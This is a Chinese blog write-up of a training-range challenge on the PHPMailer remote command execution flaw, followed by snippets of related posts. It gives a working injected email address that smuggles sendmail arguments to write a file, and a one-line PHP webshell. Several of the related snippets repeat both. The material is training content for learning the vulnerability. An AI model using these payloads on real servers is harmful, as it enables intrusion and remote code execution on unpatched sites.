墨者PHPMailer远程命令执行漏洞溯源题解

于 2022-01-07 19:40:56 发布
阅读量493 收藏
点赞数
分类专栏: 做题记录 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zr1213159840/article/details/122370725
版权

打开环境后,给了一个页面,但是啥也没有,看不出来
在这里插入图片描述
对目录进行一下爆破试试,使用dirsearch,能看到有个mail.php
在这里插入图片描述
百度一下看下这个phpmailer有什么问题,发现存在命令执行漏洞,那么就是按照步骤跑就行了。
在这里插入图片描述
打开xxx/mail.php页面,在you name栏里面随便写啥,比如abc。在your email栏中填入:“aaa”. -OQueueDirectory=/tmp/. -X/var/www/html/a.php @ aaa.com
在your message中填入一句话木马

<?php@eval($_POST['woshimuma']);?>

最后点击send email
在这里插入图片描述
等会后,访问下a.php看看,可以正常访问
在这里插入图片描述

然后使用蚁剑进行连接
在这里插入图片描述
拿到key
在这里插入图片描述
在这里插入图片描述

铁锤2号
关注
专栏目录
墨者学院-PHPMailer远程命令执行漏洞溯源
qq_47094508的博客
07-01 937
拿到靶场之后点击访问分享一个小工具,用来爬取相关的url Link Gopher可以看到有用的就一个mail.php 进入之后来到一个邮件测试页面,很明显这里是一个功能点 phpmailer介绍PHPMailer是一个用于发送电子邮件的PHP函数包。直接用PHP就可以发送,无需搭建复杂的Email服务。相关漏洞CVE编号(CVE-2016-10033)burp抓包,更改email处payload为 更改message处payload为 然后访问http://124.70.71.251
PHPMailer远程命令执行漏洞溯源
cc_de_csdn的博客
08-25 309
1.打开靶场,找到发送邮件的位置,进入邮件页面 2.填写邮件消息 1.任意用户名 2.在email写入: “aaa”. -OQueueDirectory=/tmp/. -X/var/www/html/a.php @aaa.com 3.在message写入: <?php @eval($_POST[a]);?> 3.使用菜刀连接,链接是:http://219.153.49.228:4105...
墨者靶场 初级:PHPMailer远程命令执行漏洞溯源
qq_43233085的博客
01-14 689
墨者靶场 初级:PHPMailer远程命令执行漏洞溯源题目背景介绍实训目标解题方向解题步骤 题目 背景介绍 安全工程师对某网站进行授权测试,发现了一个管理员留下的邮件测试页面,你能帮他完成测试吗 实训目标 1、了解PHPMailer用处; 2、了解Burp suite中Spider模块使用方法; 3、了解PHPMailer远程命令执行漏洞形成原因; 4、了解PHPMailer远程命令执行漏洞利用...
墨者_Tomcat 远程代码执行漏洞利用(第1题)
weixin_50698958的博客
10-12 441
靶场: https://www.mozhe.cn/bug/detail/WFVzRjBLZjFObGE4YjFwaGhXLzVldz09bW96aGUmozhe 背景介绍 “墨者”工程师对一个已经授权的网站进行测试,发现全是静态页面。以为没有漏洞,但在测试环境时发现Web 应用服务器是Tomcat,版本为7.0.79。你能找到漏洞吗? 实训目标 1、了解Tomcat配置; 2、了解特定版本的Tomcat漏洞; 3、掌握Tomcat远程代码执行漏洞的利用方式; 解题方向 通过Tomcat的代
墨者学院-WordPress 远程命令执行漏洞(CVE-2018-15877)复现
JimWu的博客
09-05 1284
WordPress 远程命令执行漏洞(CVE-2018-15877)复现 难易程度:★★ 题目类型:CMS漏洞 使用工具:FireFox浏览器、burpsuite 1.打开靶场,找到登录,点击进去。 2.尝试弱口令登录,都失败了,知道账号为admin。 没有验证码,打开burpsuite,尝试暴力破解。 3.得到密码为123qwe。 4.该漏洞为Activity Monitor插件远程命令执行漏...
墨者学院WebShell文件上传漏洞分析溯源
gudugeji的博客
10-22 399
1.第一题 编写一句话木马,然后上传文件,改文件不可上传,改后缀为php5 然后用菜刀连接 连接成功打开html,得到flag 2.第二题 上传shell图片,burp抓包,改jpg为php,点Forward,然后菜刀连接,同题1 ...
PHPMailer命令执行及任意文件读取漏洞
02-10 1765
  今天在thinkphp官网闲逛,无意下载了一套eduaskcms,查看了一下libs目录中居然存在PHPMailer-5.2.13,想起了之前看到的PHPMailer漏洞,可惜这套CMS只提供了一个邮箱接口,前台页面需要单独自己写,没办法用这套CMS进行复现,这边也顺便利用这个PHPMailer-5.2.13对CVE-2016-10033和CVE-2017-5223进行本地复现,记录一下。 ...
经典CVE:PHPMailer 远程命令执行漏洞
zh的博客
10-15 545
靶场地址:http://whalwl.site:8038/ 解题准备:了解PHPMailer 远程命令执行漏洞的利用方法 解题思路: 1、在右键发送页面,构造一句话 2、提示发送失败,但其实一句话已经完成 3、 尝试访问一句话,成功 4、蚁剑连接成功,去找flag把 ...
PHPMailer远程命令执行漏洞复现
thelostworld
12-31 1767
PHPMailer远程命令执行漏洞复现 一、漏洞简介 PHPMailer是PHP电子邮件创建及传输类,用于多个开源项目:WordPress, Drupal, 1CRM, SugarCRM, Yii, Joomla!等。 PHPMailer < 5.2.18版本存在安全漏洞,可使未经身份验证的远程攻击者在Web服务器用户上下文中执行任意代码,远程控制目标web应用。 二、影响版本: PHPMailer<5.2.18 三、漏洞复现 Docker环境: dockerrun --r..
在线靶场-墨者-命令执行2星-PHPMailer远程命令执行漏洞溯源
weixin_42079912的博客
08-09 379
打开靶场网页,根据题意管理员留下的邮件测试页面。于是寻找邮件测试页面。 打开邮件测试页面。 使用邮件注入木马 You name:mozhe(随便输入) Your email:“abc”. -OQueueDirectory=/tmp/. -X/var/www/html/abc.php @abc.com(abc可更改) You message:<?php @eval($_POST[abc])...
PHPMailer远程命令执行漏洞复现(CVE-2016-10033)
谢公子的博客
04-05 2149
PHPMailer是一个基于PHP语言的邮件发送组件,被广泛运用于诸如WordPress、Drupal、1CRM、SugarCRM、Yii、Joomla等用户量巨大的应用与框架中。 CVE-2016-10033是PHPMailer中存在的高危漏洞,这个高危漏洞是由 class.phpmailer.php 没有正确处理用户的请求导致的攻击者只需巧妙地构造出一个恶意邮箱地址,即可写入任意文件,造...
墨者 - PHPMailer远程命令执行漏洞溯源
吃肉唐僧的博客
06-30 1502
用bp抓包,发现与后台交互的文件 构建email "aaa".-OQueueDirectory=/tmp/.-X/var/www/html/a.php@ aaa.com message <?php@eval($_REQUEST[a]);?> 访问a.php文件,上传成功 菜刀无惧链接 原理参考:https...
PHPMailer 命令执行漏洞(CVE-2016-10033)分析
浮生若梦的专栏
01-01 9204
PHPMailer是一个基于PHP语言的邮件发送组件,被广泛运用于诸如WordPress, Drupal, 1CRM, SugarCRM, Yii, Joomla!等用户量巨大的应用与框架中。 CVE-2016-10033是PHPMailer中存在的高危安全漏洞,攻击者只需巧妙地构造出一个恶意邮箱地址,即可写入任意文件,造成远程命令执行的危害。 对比一下新老版本: https://github
漏洞情报 | PHPMailer 多个远程代码执行漏洞
爱国小白帽
06-18 560
​ 点击上方 订阅话题 第一时间了解漏洞威胁 0x01 漏洞描述 PHPMailer是一个用于发送电子邮件的PHP类库。 2021年6月18日,360漏洞云监测到PHPMailer 6.5.0之前的版本存在多个远程代码执行漏洞。 CVE-2021-34551:该漏洞源于在处理$lang_path参数时对setLanguage()方法内用户提供数据的验证不足,远程攻击者可向应用传送一个特殊构造的输入,通过受影响的参数设置UNC路径,从而在系统上执行任意PHP代码。 CVE-2021-3603:该该漏洞
墨者学院sqlmap Host头注入
最新发布
07-28
墨者学院SQLMap是一款常用的自动化SQL注入工具,用于检测和利用Web应用程序中的SQL注入漏洞。而Host头注入是一种特定类型的SQL注入攻击方法,攻击者通过修改HTTP请求头中的Host字段来执行恶意的SQL查询。 使用SQLMap进行Host头注入的步骤如下: 1. 首先,确认目标网站存在Host头注入漏洞。可以通过手动尝试修改Host字段并观察响应来确认漏洞存在与否。 2. 下载并安装SQLMap工具。可以从墨者学院的官方网站或GitHub仓库获取最新版本。 3. 执行命令`sqlmap -u "目标URL" --headers="Host: 注入点"`,其中目标URL是要测试的目标网站URL,注入点是漏洞存在的Host字段位置。 4. SQLMap将自动进行漏洞检测和注入测试,并生成相关报告和结果。 请注意,Host头注入是一种非常危险的攻击方法,仅限用于合法的安全测试目的。在未经授权的情况下使用该方法进行攻击是违法的,并可能导致法律后果。在进行任何安全测试之前,请确保获得合法授权并遵守适用的法律法规。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值